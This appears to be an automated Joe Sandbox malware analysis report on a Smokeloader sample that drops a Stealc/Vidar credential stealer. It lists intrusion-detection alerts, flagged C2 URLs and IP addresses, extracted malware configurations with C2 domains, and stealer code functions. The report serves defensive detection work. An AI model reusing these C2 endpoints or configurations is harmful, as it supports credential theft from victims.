Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:18.223191+0200
SID:	2851815
Severity:	1
Source Port:	56187
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:11.872786+0200
SID:	2039103
Severity:	1
Source Port:	56186
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:11.872786+0200
SID:	2851815
Severity:	1
Source Port:	56186
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:43.499336+0200
SID:	2039103
Severity:	1
Source Port:	56191
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:43.499336+0200
SID:	2851815
Severity:	1
Source Port:	56191
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:30.490429+0200
SID:	2039103
Severity:	1
Source Port:	56148
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:29.220719+0200
SID:	2039103
Severity:	1
Source Port:	56147
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:29.220719+0200
SID:	2851815
Severity:	1
Source Port:	56147
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:28:09.063507+0200
SID:	2039103
Severity:	1
Source Port:	56176
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:26.372267+0200
SID:	2039103
Severity:	1
Source Port:	56145
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:26.372267+0200
SID:	2851815
Severity:	1
Source Port:	56145
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:24.807233+0200
SID:	2803304
Severity:	3
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:24.858836+0200
SID:	2039103
Severity:	1
Source Port:	56144
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:24.858836+0200
SID:	2851815
Severity:	1
Source Port:	56144
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:36.396183+0200
SID:	2039103
Severity:	1
Source Port:	56190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:36.396183+0200
SID:	2851815
Severity:	1
Source Port:	56190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:28:05.693162+0200
SID:	2039103
Severity:	1
Source Port:	56174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:22.307582+0200
SID:	2039103
Severity:	1
Source Port:	56142
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:21.409420+0200
SID:	2803304
Severity:	3
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:27.965547+0200
SID:	2039103
Severity:	1
Source Port:	56146
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:27.965547+0200
SID:	2851815
Severity:	1
Source Port:	56146
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:36.057038+0200
SID:	2039103
Severity:	1
Source Port:	56152
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:36.057038+0200
SID:	2851815
Severity:	1
Source Port:	56152
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:43.796524+0200
SID:	2039103
Severity:	1
Source Port:	56158
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:43.796524+0200
SID:	2851815
Severity:	1
Source Port:	56158
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:29:57.566254+0200
SID:	2039103
Severity:	1
Source Port:	56184
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:29:57.566254+0200
SID:	2851815
Severity:	1
Source Port:	56184
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:31.874870+0200
SID:	2039103
Severity:	1
Source Port:	56149
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:57.953912+0200
SID:	2039103
Severity:	1
Source Port:	56170
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:11.581616+0200
SID:	2044243
Severity:	1
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:29:19.120665+0200
SID:	2039103
Severity:	1
Source Port:	56178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:13.644145+0200
SID:	2803304
Severity:	3
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:20.207780+0200
SID:	2803304
Severity:	3
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 92.36.226.66

Timestamp:	2024-09-01T18:30:05.185420+0200
SID:	2039103
Severity:	1
Source Port:	56185
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:52.655324+0200
SID:	2039103
Severity:	1
Source Port:	56165
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:29:47.286090+0200
SID:	2039103
Severity:	1
Source Port:	56183
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:50.133325+0200
SID:	2039103
Severity:	1
Source Port:	56162
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:28:04.415568+0200
SID:	2039103
Severity:	1
Source Port:	56173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:34.494902+0200
SID:	2039103
Severity:	1
Source Port:	56151
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:34.494902+0200
SID:	2851815
Severity:	1
Source Port:	56151
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:56.670804+0200
SID:	2039103
Severity:	1
Source Port:	56168
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:12.056479+0200
SID:	2044246
Severity:	1
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:33.232836+0200
SID:	2039103
Severity:	1
Source Port:	56150
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:29:26.363148+0200
SID:	2039103
Severity:	1
Source Port:	56179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:29:26.363148+0200
SID:	2851815
Severity:	1
Source Port:	56179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:29:33.679221+0200
SID:	2039103
Severity:	1
Source Port:	56181
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:29:33.679221+0200
SID:	2851815
Severity:	1
Source Port:	56181
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:45.059197+0200
SID:	2039103
Severity:	1
Source Port:	56159
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:45.059197+0200
SID:	2851815
Severity:	1
Source Port:	56159
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:19.097014+0200
SID:	2803304
Severity:	3
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config - Source IP: 91.202.233.158 - Destination IP: 192.168.2.4

Timestamp:	2024-09-01T18:28:11.832589+0200
SID:	2044245
Severity:	1
Source Port:	80
Destination Port:	56177
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:29:40.841730+0200
SID:	2039103
Severity:	1
Source Port:	56182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:11.818662+0200
SID:	2044244
Severity:	1
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Submitting System Information to C2 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:13.139572+0200
SID:	2044248
Severity:	1
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:41.274011+0200
SID:	2039103
Severity:	1
Source Port:	56156
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.4 - Destination IP: 84.32.84.144

Timestamp:	2024-09-01T18:27:58.652505+0200
SID:	2019714
Severity:	2
Source Port:	56171
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:38.658236+0200
SID:	2039103
Severity:	1
Source Port:	56154
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:51.385279+0200
SID:	2039103
Severity:	1
Source Port:	56164
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:42.526719+0200
SID:	2039103
Severity:	1
Source Port:	56157
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 191.191.224.16

Timestamp:	2024-09-01T18:27:23.581272+0200
SID:	2039103
Severity:	1
Source Port:	56143
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Submitting Screenshot to C2 - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-01T18:28:27.560020+0200
SID:	2044249
Severity:	1
Source Port:	56177
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://91.202.233.158/e96ea2db21fa9a1b.phpK	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/3836fd5700214436/nss3.dllA5	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/3836fd5700214436/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/3836fd5700214436/nss3.dll%	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php.dll	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/3836fd5700214436/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php3	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/3836fd5700214436/msvcp140.dllj	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpK0	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php7	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/3836fd5700214436/nss3.dll:	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php-fulluser-l1-1-0	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php?	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/7	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/3836fd5700214436/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/E	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpg	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpo	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/3836fd5700214436/nss3.dll	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/3836fd5700214436/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/3836fd5700214436/softokn3.dllR	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpg0	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpN=	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phption:	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.1937857892.00000000006B0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://epohe.ru/tmp/", "http://olihonols.in.net/tmp/", "http://nicetolosv.xyz/tmp/", "http://jftolsa.ws/tmp/"]}
Source: 26.2.DFA6.exe.35b0000.1.raw.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
Source: 26.2.DFA6.exe.35b0000.1.raw.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}

Multi AV Scanner detection for domain / URL

Source: http://91.202.233.158/3836fd5700214436/msvcp140.dll	Virustotal: Detection: 5%	Perma Link
Source: http://91.202.233.158/3836fd5700214436/sqlite3.dll	Virustotal: Detection: 5%	Perma Link
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpK	Virustotal: Detection: 11%	Perma Link
Source: http://91.202.233.158/	Virustotal: Detection: 12%	Perma Link
Source: http://91.202.233.158/e96ea2db21fa9a1b.php	Virustotal: Detection: 5%	Perma Link
Source: http://91.202.233.158/3836fd5700214436/vcruntime140.dll	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\ewggbbh	ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: h8jGj6Qe78.exe	ReversingLabs: Detection: 42%
Source: h8jGj6Qe78.exe	Virustotal: Detection: 40%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ewggbbh	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: h8jGj6Qe78.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C846C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	29_2_6C846C80
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C99A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	29_2_6C99A9A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9944C0 PK11_PubEncrypt,	29_2_6C9944C0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C964420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	29_2_6C964420
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C994440 PK11_PrivDecrypt,	29_2_6C994440
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9E25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	29_2_6C9E25B0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C97E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	29_2_6C97E6E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C99A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	29_2_6C99A650
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C978670 PK11_ExportEncryptedPrivKeyInfo,	29_2_6C978670
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9BA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	29_2_6C9BA730
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9C0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	29_2_6C9C0180
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9943B0 PK11_PubEncryptPKCS1,PR_SetError,	29_2_6C9943B0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9B7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	29_2_6C9B7C00
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9BBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	29_2_6C9BBD30
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C977D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	29_2_6C977D60
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9B9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	29_2_6C9B9EC0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C993FF0 PK11_PrivDecryptPKCS1,	29_2_6C993FF0

Source: h8jGj6Qe78.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 84.32.84.144:443 -> 192.168.2.4:56171 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: svchost015.exe, 0000001D.00000002.2675141656.000000006C8AD000.00000002.00000001.01000000.0000000F.sdmp, mozglue[1].dll.29.dr, mozglue.dll.29.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.29.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.29.dr
Source:	Binary string: nss3.pdb@ source: svchost015.exe, 0000001D.00000002.2679610884.000000006CA6F000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.29.dr, nss3[1].dll.29.dr
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 0000001F.00000000.3039162333.0000000000272000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe.17.dr
Source:	Binary string: softokn3.pdb@ source: softokn3.dll.29.dr
